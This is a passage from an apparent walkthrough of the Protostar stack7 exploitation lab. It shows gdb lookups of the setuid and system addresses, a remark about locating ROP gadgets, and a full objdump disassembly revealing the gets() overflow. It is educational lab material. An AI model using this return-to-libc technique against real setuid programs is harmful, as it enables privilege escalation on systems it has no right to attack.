span class="code-line"span class="go"0x08048550 lt;main+11gt;:   mov    esp,ebp/span/span
span class="code-line"span class="go"0x08048552 lt;main+13gt;:   pop    ebp/span/span
span class="code-line"span class="go"0x08048553 lt;main+14gt;:   ret    /span/span
span class="code-line"span class="go"End of assembler dump./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048545/span/span
span class="code-line"span class="go"Breakpoint 1 at 0x8048545: file stack7/stack7.c, line 27./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span
span class="code-line"span class="go"Starting program: /opt/protostar/bin/stack7 /span/span
span class="code-line"/span
span class="code-line"span class="go"Breakpoint 1, main (argc=1, argv=0xbffff864) at stack7/stack7.c:27/span/span
span class="code-line"span class="go"27  stack7/stack7.c: No such file or directory./span/span
span class="code-line"span class="go"    in stack7/stack7.c/span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print setuid/span/span
span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2ec80 lt;__setuidgt;/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print system/span/span
span class="code-line"span class="gp"$/spanspan class="nv"2/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7ecffb0 lt;__libc_systemgt;/span
span class="code-line"/code/pre/div
/td/tr/table
pNow we need to find the addresses of our ROP gadgets, the first being just a coderet/code instruction and the second being a codepop [register], ret/code sequence to remove the argument to codesetuid/code before running codesystem/code, although these gadgets will be 1 byte away from each other:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"  1/span/span
span class="code-line"span class="normal"  2/span/span
span class="code-line"span class="normal"  3/span/span
span class="code-line"span class="normal"  4/span/span
span class="code-line"span class="normal"  5/span/span
span class="code-line"span class="normal"  6/span/span
span class="code-line"span class="normal"  7/span/span
span class="code-line"span class="normal"  8/span/span
span class="code-line"span class="normal"  9/span/span
span class="code-line"span class="normal" 10/span/span
span class="code-line"span class="normal" 11/span/span
span class="code-line"span class="normal" 12/span/span
span class="code-line"span class="normal" 13/span/span
span class="code-line"span class="normal" 14/span/span
span class="code-line"span class="normal" 15/span/span
span class="code-line"span class="normal" 16/span/span
span class="code-line"span class="normal" 17/span/span
span class="code-line"span class="normal" 18/span/span
span class="code-line"span class="normal" 19/span/span
span class="code-line"span class="normal" 20/span/span
span class="code-line"span class="normal" 21/span/span
span class="code-line"span class="normal" 22/span/span
span class="code-line"span class="normal" 23/span/span
span class="code-line"span class="normal" 24/span/span
span class="code-line"span class="normal" 25/span/span
span class="code-line"span class="normal" 26/span/span
span class="code-line"span class="normal" 27/span/span
span class="code-line"span class="normal" 28/span/span
span class="code-line"span class="normal" 29/span/span
span class="code-line"span class="normal" 30/span/span
span class="code-line"span class="normal" 31/span/span
span class="code-line"span class="normal" 32/span/span
span class="code-line"span class="normal" 33/span/span
span class="code-line"span class="normal" 34/span/span
span class="code-line"span class="normal" 35/span/span
span class="code-line"span class="normal" 36/span/span
span class="code-line"span class="normal" 37/span/span
span class="code-line"span class="normal" 38/span/span
span class="code-line"span class="normal" 39/span/span
span class="code-line"span class="normal" 40/span/span
span class="code-line"span class="normal" 41/span/span
span class="code-line"span class="normal" 42/span/span
span class="code-line"span class="normal" 43/span/span
span class="code-line"span class="normal" 44/span/span
span class="code-line"span class="normal" 45/span/span
span class="code-line"span class="normal" 46/span/span
span class="code-line"span class="normal" 47/span/span
span class="code-line"span class="normal" 48/span/span
span class="code-line"span class="normal" 49/span/span
span class="code-line"span class="normal" 50/span/span
span class="code-line"span class="normal" 51/span/span
span class="code-line"span class="normal" 52/span/span
span class="code-line"span class="normal" 53/span/span
span class="code-line"span class="normal" 54/span/span
span class="code-line"span class="normal" 55/span/span
span class="code-line"span class="normal" 56/span/span
span class="code-line"span class="normal" 57/span/span
span class="code-line"span class="normal" 58/span/span
span class="code-line"span class="normal" 59/span/span
span class="code-line"span class="normal" 60/span/span
span class="code-line"span class="normal" 61/span/span
span class="code-line"span class="normal" 62/span/span
span class="code-line"span class="normal" 63/span/span
span class="code-line"span class="normal" 64/span/span
span class="code-line"span class="normal" 65/span/span
span class="code-line"span class="normal" 66/span/span
span class="code-line"span class="normal" 67/span/span
span class="code-line"span class="normal" 68/span/span
span class="code-line"span class="normal" 69/span/span
span class="code-line"span class="normal" 70/span/span
span class="code-line"span class="normal" 71/span/span
span class="code-line"span class="normal" 72/span/span
span class="code-line"span class="normal" 73/span/span
span class="code-line"span class="normal" 74/span/span
span class="code-line"span class="normal" 75/span/span
span class="code-line"span class="normal" 76/span/span
span class="code-line"span class="normal" 77/span/span
span class="code-line"span class="normal" 78/span/span
span class="code-line"span class="normal" 79/span/span
span class="code-line"span class="normal" 80/span/span
span class="code-line"span class="normal" 81/span/span
span class="code-line"span class="normal" 82/span/span
span class="code-line"span class="normal" 83/span/span
span class="code-line"span class="normal" 84/span/span
span class="code-line"span class="normal" 85/span/span
span class="code-line"span class="normal" 86/span/span
span class="code-line"span class="normal" 87/span/span
span class="code-line"span class="normal" 88/span/span
span class="code-line"span class="normal" 89/span/span
span class="code-line"span class="normal" 90/span/span
span class="code-line"span class="normal" 91/span/span
span class="code-line"span class="normal" 92/span/span
span class="code-line"span class="normal" 93/span/span
span class="code-line"span class="normal" 94/span/span
span class="code-line"span class="normal" 95/span/span
span class="code-line"span class="normal" 96/span/span
span class="code-line"span class="normal" 97/span/span
span class="code-line"span class="normal" 98/span/span
span class="code-line"span class="normal" 99/span/span
span class="code-line"span class="normal"100/span/span
span class="code-line"span class="normal"101/span/span
span class="code-line"span class="normal"102/span/span
span class="code-line"span class="normal"103/span/span
span class="code-line"span class="normal"104/span/span
span class="code-line"span class="normal"105/span/span
span class="code-line"span class="normal"106/span/span
span class="code-line"span class="normal"107/span/span
span class="code-line"span class="normal"108/span/span
span class="code-line"span class="normal"109/span/span
span class="code-line"span class="normal"110/span/span
span class="code-line"span class="normal"111/span/span
span class="code-line"span class="normal"112/span/span
span class="code-line"span class="normal"113/span/span
span class="code-line"span class="normal"114/span/span
span class="code-line"span class="normal"115/span/span
span class="code-line"span class="normal"116/span/span
span class="code-line"span class="normal"117/span/span
span class="code-line"span class="normal"118/span/span
span class="code-line"span class="normal"119/span/span
span class="code-line"span class="normal"120/span/span
span class="code-line"span class="normal"121/span/span
span class="code-line"span class="normal"122/span/span
span class="code-line"span class="normal"123/span/span
span class="code-line"span class="normal"124/span/span
span class="code-line"span class="normal"125/span/span
span class="code-line"span class="normal"126/span/span
span class="code-line"span class="normal"127/span/span
span class="code-line"span class="normal"128/span/span
span class="code-line"span class="normal"129/span/span
span class="code-line"span class="normal"130/span/span
span class="code-line"span class="normal"131/span/span
span class="code-line"span class="normal"132/span/span
span class="code-line"span class="normal"133/span/span
span class="code-line"span class="normal"134/span/span
span class="code-line"span class="normal"135/span/span
span class="code-line"span class="normal"136/span/span
span class="code-line"span class="normal"137/span/span
span class="code-line"span class="normal"138/span/span
span class="code-line"span class="normal"139/span/span
span class="code-line"span class="normal"140/span/span
span class="code-line"span class="normal"141/span/span
span class="code-line"span class="normal"142/span/span
span class="code-line"span class="normal"143/span/span
span class="code-line"span class="normal"144/span/span
span class="code-line"span class="normal"145/span/span
span class="code-line"span class="normal"146/span/span
span class="code-line"span class="normal"147/span/span
span class="code-line"span class="normal"148/span/span
span class="code-line"span class="normal"149/span/span
span class="code-line"span class="normal"150/span/span
span class="code-line"span class="normal"151/span/span
span class="code-line"span class="normal"152/span/span
span class="code-line"span class="normal"153/span/span
span class="code-line"span class="normal"154/span/span
span class="code-line"span class="normal"155/span/span
span class="code-line"span class="normal"156/span/span
span class="code-line"span class="normal"157/span/span
span class="code-line"span class="normal"158/span/span
span class="code-line"span class="normal"159/span/span
span class="code-line"span class="normal"160/span/span
span class="code-line"span class="normal"161/span/span
span class="code-line"span class="normal"162/span/span
span class="code-line"span class="normal"163/span/span
span class="code-line"span class="normal"164/span/span
span class="code-line"span class="normal"165/span/span
span class="code-line"span class="normal"166/span/span
span class="code-line"span class="normal"167/span/span
span class="code-line"span class="normal"168/span/span
span class="code-line"span class="normal"169/span/span
span class="code-line"span class="normal"170/span/span
span class="code-line"span class="normal"171/span/span
span class="code-line"span class="normal"172/span/span
span class="code-line"span class="normal"173/span/span
span class="code-line"span class="normal"174/span/span
span class="code-line"span class="normal"175/span/span
span class="code-line"span class="normal"176/span/span
span class="code-line"span class="normal"177/span/span
span class="code-line"span class="normal"178/span/span
span class="code-line"span class="normal"179/span/span
span class="code-line"span class="normal"180/span/span
span class="code-line"span class="normal"181/span/span
span class="code-line"span class="normal"182/span/span
span class="code-line"span class="normal"183/span/span
span class="code-line"span class="normal"184/span/span
span class="code-line"span class="normal"185/span/span
span class="code-line"span class="normal"186/span/span
span class="code-line"span class="normal"187/span/span
span class="code-line"span class="normal"188/span/span
span class="code-line"span class="normal"189/span/span
span class="code-line"span class="normal"190/span/span
span class="code-line"span class="normal"191/span/span
span class="code-line"span class="normal"192/span/span
span class="code-line"span class="normal"193/span/span
span class="code-line"span class="normal"194/span/span
span class="code-line"span class="normal"195/span/span
span class="code-line"span class="normal"196/span/span
span class="code-line"span class="normal"197/span/span
span class="code-line"span class="normal"198/span/span
span class="code-line"span class="normal"199/span/span
span class="code-line"span class="normal"200/span/span
span class="code-line"span class="normal"201/span/span
span class="code-line"span class="normal"202/span/span
span class="code-line"span class="normal"203/span/span
span class="code-line"span class="normal"204/span/span
span class="code-line"span class="normal"205/span/span
span class="code-line"span class="normal"206/span/span
span class="code-line"span class="normal"207/span/span
span class="code-line"span class="normal"208/span/span
span class="code-line"span class="normal"209/span/span
span class="code-line"span class="normal"210/span/span
span class="code-line"span class="normal"211/span/span
span class="code-line"span class="normal"212/span/span
span class="code-line"span class="normal"213/span/span
span class="code-line"span class="normal"214/span/span
span class="code-line"span class="normal"215/span/span
span class="code-line"span class="normal"216/span/span
span class="code-line"span class="normal"217/span/span
span class="code-line"span class="normal"218/span/span
span class="code-line"span class="normal"219/span/span
span class="code-line"span class="normal"220/span/span
span class="code-line"span class="normal"221/span/span
span class="code-line"span class="normal"222/span/span
span class="code-line"span class="normal"223/span/span
span class="code-line"span class="normal"224/span/span
span class="code-line"span class="normal"225/span/span
span class="code-line"span class="normal"226/span/span
span class="code-line"span class="normal"227/span/span
span class="code-line"span class="normal"228/span/span
span class="code-line"span class="normal"229/span/span
span class="code-line"span class="normal"230/span/span
span class="code-line"span class="normal"231/span/span
span class="code-line"span class="normal"232/span/span
span class="code-line"span class="normal"233/span/span
span class="code-line"span class="normal"234/span/span
span class="code-line"span class="normal"235/span/span
span class="code-line"span class="normal"236/span/span
span class="code-line"span class="normal"237/span/span
span class="code-line"span class="normal"238/span/span
span class="code-line"span class="normal"239/span/span
span class="code-line"span class="normal"240/span/span
span class="code-line"span class="normal"241/span/span
span class="code-line"span class="normal"242/span/span
span class="code-line"span class="normal"243/span/span
span class="code-line"span class="normal"244/span/span
span class="code-line"span class="normal"245/span/span
span class="code-line"span class="normal"246/span/span
span class="code-line"span class="normal"247/span/span
span class="code-line"span class="normal"248/span/span
span class="code-line"span class="normal"249/span/span
span class="code-line"span class="normal"250/span/span
span class="code-line"span class="normal"251/span/span
span class="code-line"span class="normal"252/span/span
span class="code-line"span class="normal"253/span/span
span class="code-line"span class="normal"254/span/span
span class="code-line"span class="normal"255/span/span
span class="code-line"span class="normal"256/span/span
span class="code-line"span class="normal"257/span/span
span class="code-line"span class="normal"258/span/span
span class="code-line"span class="normal"259/span/span
span class="code-line"span class="normal"260/span/span
span class="code-line"span class="normal"261/span/span
span class="code-line"span class="normal"262/span/span
span class="code-line"span class="normal"263/span/span
span class="code-line"span class="normal"264/span/span
span class="code-line"span class="normal"265/span/span
span class="code-line"span class="normal"266/span/span
span class="code-line"span class="normal"267/span/span
span class="code-line"span class="normal"268/span/span
span class="code-line"span class="normal"269/span/span
span class="code-line"span class="normal"270/span/span
span class="code-line"span class="normal"271/span/span
span class="code-line"span class="normal"272/span/span
span class="code-line"span class="normal"273/span/span
span class="code-line"span class="normal"274/span/span
span class="code-line"span class="normal"275/span/span
span class="code-line"span class="normal"276/span/span
span class="code-line"span class="normal"277/span/span
span class="code-line"span class="normal"278/span/span
span class="code-line"span class="normal"279/span/span
span class="code-line"span class="normal"280/span/span
span class="code-line"span class="normal"281/span/span
span class="code-line"span class="normal"282/span/span
span class="code-line"span class="normal"283/span/span
span class="code-line"span class="normal"284/span/span
span class="code-line"span class="normal"285/span/span
span class="code-line"span class="normal"286/span/span
span class="code-line"span class="normal"287/span/span
span class="code-line"span class="normal"288/span/span
span class="code-line"span class="normal"289/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"user@protostar:/opt/protostar/bin$ objdump -d ./stack7 -M intel/span/span
span class="code-line"/span
span class="code-line"span class="nl"./stack7/spanspan class="p":/span     file format span class="s"elf32-i386/span/span
span class="code-line"/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".init/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048354/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_init/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048354:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048355:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048357:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048358:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 804835b:   e8 00 00 00 00          call   8048360 lt;_init+0xcgt;/span/span
span class="code-line"span class="x" 8048360:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048361:   81 c3 dc 13 00 00       add    ebx,0x13dc/span/span
span class="code-line"span class="x" 8048367:   8b 93 fc ff ff ff       mov    edx,DWORD PTR [ebx-0x4]/span/span
span class="code-line"span class="x" 804836d:   85 d2                   test   edx,edx/span/span
span class="code-line"span class="x" 804836f:   74 05                   je     8048376 lt;_init+0x22gt;/span/span
span class="code-line"span class="x" 8048371:   e8 1e 00 00 00          call   8048394 lt;__gmon_start__@pltgt;/span/span
span class="code-line"span class="x" 8048376:   e8 25 01 00 00          call   80484a0 lt;frame_dummygt;/span/span
span class="code-line"span class="x" 804837b:   e8 50 02 00 00          call   80485d0 lt;__do_global_ctors_auxgt;/span/span
span class="code-line"span class="x" 8048380:   58                      pop    eax/span/span
span class="code-line"span class="x" 8048381:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048382:   c9                      leave  /span/span
span class="code-line"span class="x" 8048383:   c3                      ret    /span/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".plt/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048384/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__gmon_start__@plt/spanspan class="p"-/spanspan class="mh"0x10/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048384:   ff 35 40 97 04 08       push   DWORD PTR ds:0x8049740/span/span
span class="code-line"span class="x" 804838a:   ff 25 44 97 04 08       jmp    DWORD PTR ds:0x8049744/span/span
span class="code-line"span class="x" 8048390:   00 00                   add    BYTE PTR [eax],al/span/span
span class="code-line"span class="x"    .../span/span
span class="code-line"/span
span class="code-line"span class="mh"08048394/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__gmon_start__@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048394:   ff 25 48 97 04 08       jmp    DWORD PTR ds:0x8049748/span/span
span class="code-line"span class="x" 804839a:   68 00 00 00 00          push   0x0/span/span
span class="code-line"span class="x" 804839f:   e9 e0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483a4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"gets@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483a4:   ff 25 4c 97 04 08       jmp    DWORD PTR ds:0x804974c/span/span
span class="code-line"span class="x" 80483aa:   68 08 00 00 00          push   0x8/span/span
span class="code-line"span class="x" 80483af:   e9 d0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483b4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_start_main@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483b4:   ff 25 50 97 04 08       jmp    DWORD PTR ds:0x8049750/span/span
span class="code-line"span class="x" 80483ba:   68 10 00 00 00          push   0x10/span/span
span class="code-line"span class="x" 80483bf:   e9 c0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483c4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_exit@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483c4:   ff 25 54 97 04 08       jmp    DWORD PTR ds:0x8049754/span/span
span class="code-line"span class="x" 80483ca:   68 18 00 00 00          push   0x18/span/span
span class="code-line"span class="x" 80483cf:   e9 b0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483d4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"fflush@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483d4:   ff 25 58 97 04 08       jmp    DWORD PTR ds:0x8049758/span/span
span class="code-line"span class="x" 80483da:   68 20 00 00 00          push   0x20/span/span
span class="code-line"span class="x" 80483df:   e9 a0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483e4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"printf@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483e4:   ff 25 5c 97 04 08       jmp    DWORD PTR ds:0x804975c/span/span
span class="code-line"span class="x" 80483ea:   68 28 00 00 00          push   0x28/span/span
span class="code-line"span class="x" 80483ef:   e9 90 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483f4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strdup@plt/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483f4:   ff 25 60 97 04 08       jmp    DWORD PTR ds:0x8049760/span/span
span class="code-line"span class="x" 80483fa:   68 30 00 00 00          push   0x30/span/span
span class="code-line"span class="x" 80483ff:   e9 80 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".text/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048410/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_start/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048410:   31 ed                   xor    ebp,ebp/span/span
span class="code-line"span class="x" 8048412:   5e                      pop    esi/span/span
span class="code-line"span class="x" 8048413:   89 e1                   mov    ecx,esp/span/span
span class="code-line"span class="x" 8048415:   83 e4 f0                and    esp,0xfffffff0/span/span
span class="code-line"span class="x" 8048418:   50                      push   eax/span/span
span class="code-line"span class="x" 8048419:   54                      push   esp/span/span
span class="code-line"span class="x" 804841a:   52                      push   edx/span/span
span class="code-line"span class="x" 804841b:   68 60 85 04 08          push   0x8048560/span/span
span class="code-line"span class="x" 8048420:   68 70 85 04 08          push   0x8048570/span/span
span class="code-line"span class="x" 8048425:   51                      push   ecx/span/span
span class="code-line"span class="x" 8048426:   56                      push   esi/span/span
span class="code-line"span class="x" 8048427:   68 45 85 04 08          push   0x8048545/span/span
span class="code-line"span class="x" 804842c:   e8 83 ff ff ff          call   80483b4 lt;__libc_start_main@pltgt;/span/span
span class="code-line"span class="x" 8048431:   f4                      hlt    /span/span
span class="code-line"span class="x" 8048432:   90                      nop/span/span
span class="code-line"span class="x" 8048433:   90                      nop/span/span
span class="code-line"span class="x" 8048434:   90                      nop/span/span
span class="code-line"span class="x" 8048435:   90                      nop/span/span
span class="code-line"span class="x" 8048436:   90                      nop/span/span
span class="code-line"span class="x" 8048437:   90                      nop/span/span
span class="code-line"span class="x" 8048438:   90                      nop/span/span
span class="code-line"span class="x" 8048439:   90                      nop/span/span
span class="code-line"span class="x" 804843a:   90                      nop/span/span
span class="code-line"span class="x" 804843b:   90                      nop/span/span
span class="code-line"span class="x" 804843c:   90                      nop/span/span
span class="code-line"span class="x" 804843d:   90                      nop/span/span
span class="code-line"span class="x" 804843e:   90                      nop/span/span
span class="code-line"span class="x" 804843f:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048440/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__do_global_dtors_aux/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048440:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048441:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048443:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048444:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 8048447:   80 3d 84 97 04 08 00    cmp    BYTE PTR ds:0x8049784,0x0/span/span
span class="code-line"span class="x" 804844e:   75 3f                   jne    804848f lt;__do_global_dtors_aux+0x4fgt;/span/span
span class="code-line"span class="x" 8048450:   a1 88 97 04 08          mov    eax,ds:0x8049788/span/span
span class="code-line"span class="x" 8048455:   bb 60 96 04 08          mov    ebx,0x8049660/span/span
span class="code-line"span class="x" 804845a:   81 eb 5c 96 04 08       sub    ebx,0x804965c/span/span
span class="code-line"span class="x" 8048460:   c1 fb 02                sar    ebx,0x2/span/span
span class="code-line"span class="x" 8048463:   83 eb 01                sub    ebx,0x1/span/span
span class="code-line"span class="x" 8048466:   39 d8                   cmp    eax,ebx/span/span
span class="code-line"span class="x" 8048468:   73 1e                   jae    8048488 lt;__do_global_dtors_aux+0x48gt;/span/span
span class="code-line"span class="x" 804846a:   8d b6 00 00 00 00       lea    esi,[esi+0x0]/span/span
span class="code-line"span class="x" 8048470:   83 c0 01                add    eax,0x1/span/span
span class="code-line"span class="x" 8048473:   a3 88 97 04 08          mov    ds:0x8049788,eax/span/span
span class="code-line"span class="x" 8048478:   ff 14 85 5c 96 04 08    call   DWORD PTR [eax*4+0x804965c]/span/span
span class="code-line"span class="x" 804847f:   a1 88 97 04 08          mov    eax,ds:0x8049788/span/span
span class="code-line"span class="x" 8048484:   39 d8                   cmp    eax,ebx/span/span
span class="code-line"span class="x" 8048486:   72 e8                   jb     8048470 lt;__do_global_dtors_aux+0x30gt;/span/span
span class="code-line"span class="x" 8048488:   c6 05 84 97 04 08 01    mov    BYTE PTR ds:0x8049784,0x1/span/span
span class="code-line"span class="x" 804848f:   83 c4 04                add    esp,0x4/span/span
span class="code-line"span class="x" 8048492:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048493:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 8048494:   c3                      ret    /span/span
span class="code-line"span class="x" 8048495:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]/span/span
span class="code-line"span class="x" 8048499:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]/span/span
span class="code-line"/span
span class="code-line"span class="mh"080484a0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"frame_dummy/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80484a0:   55                      push   ebp/span/span
span class="code-line"span class="x" 80484a1:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80484a3:   83 ec 18                sub    esp,0x18/span/span
span class="code-line"span class="x" 80484a6:   a1 64 96 04 08          mov    eax,ds:0x8049664/span/span
span class="code-line"span class="x" 80484ab:   85 c0                   test   eax,eax/span/span
span class="code-line"span class="x" 80484ad:   74 12                   je     80484c1 lt;frame_dummy+0x21gt;/span/span
span class="code-line"span class="x" 80484af:   b8 00 00 00 00          mov    eax,0x0/span/span
span class="code-line"span class="x" 80484b4:   85 c0                   test   eax,eax/span/span
span class="code-line"span class="x" 80484b6:   74 09                   je     80484c1 lt;frame_dummy+0x21gt;/span/span
span class="code-line"span class="x" 80484b8:   c7 04 24 64 96 04 08    mov    DWORD PTR [esp],0x8049664/span/span
span class="code-line"span class="x" 80484bf:   ff d0                   call   eax/span/span
span class="code-line"span class="x" 80484c1:   c9                      leave  /span/span
span class="code-line"span class="x" 80484c2:   c3                      ret    /span/span
span class="code-line"span class="x" 80484c3:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"080484c4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"getpath/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80484c4:   55                      push   ebp/span/span
span class="code-line"span class="x" 80484c5:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80484c7:   83 ec 68                sub    esp,0x68/span/span
span class="code-line"span class="x" 80484ca:   b8 20 86 04 08          mov    eax,0x8048620/span/span
span class="code-line"span class="x" 80484cf:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80484d2:   e8 0d ff ff ff          call   80483e4 lt;printf@pltgt;/span/span
span class="code-line"span class="x" 80484d7:   a1 80 97 04 08          mov    eax,ds:0x8049780/span/span
span class="code-line"span class="x" 80484dc:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80484df:   e8 f0 fe ff ff          call   80483d4 lt;fflush@pltgt;/span/span
span class="code-line"span class="x" 80484e4:   8d 45 b4                lea    eax,[ebp-0x4c]/span/span
span class="code-line"span class="x" 80484e7:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80484ea:   e8 b5 fe ff ff          call   80483a4 lt;gets@pltgt;/span/span
span class="code-line"span class="x" 80484ef:   8b 45 04                mov    eax,DWORD PTR [ebp+0x4]/span/span
span class="code-line"span class="x" 80484f2:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax/span/span
span class="code-line"span class="x" 80484f5:   8b 45 f4                mov    eax,DWORD PTR [ebp-0xc]/span/span
span class="code-line"span class="x" 80484f8:   25 00 00 00 b0          and    eax,0xb0000000/span/span
span class="code-line"span class="x" 80484fd:   3d 00 00 00 b0          cmp    eax,0xb0000000/span/span
span class="code-line"span class="x" 8048502:   75 20                   jne    8048524 lt;getpath+0x60gt;/span/span
span class="code-line"span class="x" 8048504:   b8 34 86 04 08          mov    eax,0x8048634/span/span
span class="code-line"span class="x" 8048509:   8b 55 f4                mov    edx,DWORD PTR [ebp-0xc]/span/span
span class="code-line"span class="x" 804850c:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx/span/span
span class="code-line"span class="x" 8048510:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 8048513:   e8 cc fe ff ff          call   80483e4 lt;printf@pltgt;/span/span
span class="code-line"span class="x" 8048518:   c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1/span/span
span class="code-line"span class="x" 804851f:   e8 a0 fe ff ff          call   80483c4 lt;_exit@pltgt;/span/span
span class="code-line"span class="x" 8048524:   b8 40 86 04 08          mov    eax,0x8048640/span/span
span class="code-line"span class="x" 8048529:   8d 55 b4                lea    edx,[ebp-0x4c]/span/span
span class="code-line"span class="x" 804852c:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx/span/span
span class="code-line"span class="x" 8048530:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 8048533:   e8 ac fe ff ff          call   80483e4 lt;printf@pltgt;/span/span
span class="code-line"span class="x" 8048538:   8d 45 b4                lea    eax,[ebp-0x4c]/span/span
span class="code-line"span class="x" 804853b:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 804853e:   e8 b1 fe ff ff          call   80483f4 lt;strdup@pltgt;/span/span
span class="code-line"span class="x" 8048543:   c9                      leave  /span/span
span class="code-line"span class="x" 8048544:   c3                      ret    /span/span
span class="code-line"/span
span class="code-line"span class="mh"08048545/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"main/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048545:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048546:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048548:   83 e4 f0                and    esp,0xfffffff0/span/span
span class="code-line"span class="x" 804854b:   e8 74 ff ff ff          call   80484c4 lt;getpathgt;/span/span
span class="code-line"span class="x" 8048550:   89 ec                   mov    esp,ebp/span/span
span class="code-line"span class="x" 8048552:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 8048553:   c3                      ret    /span/span
span class="code-line"span class="x" 8048554:   90                      nop/span/span
span class="code-line"span class="x" 8048555:   90                      nop/span/span
span class="code-line"span class="x" 8048556:   90                      nop/span/span
span class="code-line"span class="x" 8048557:   90                      nop/span/span
span class="code-line"span class="x" 8048558:   90                      nop/span/span
span class="code-line"span class="x" 8048559:   90                      nop/span/span
span class="code-line"span class="x" 804855a:   90                      nop/span/span
span class="code-line"span class="x" 804855b:   90                      nop/span/span
span class="code-line"span class="x" 804855c:   90                      nop/span/span
span class="code-line"span class="x" 804855d:   90                      nop/span/span
span class="code-line"span class="x" 804855e:   90                      nop/span/span
span class="code-line"span class="x" 804855f:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048560/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_fini/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048560:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048561:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048563:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 8048564:   c3                      ret    /span/span
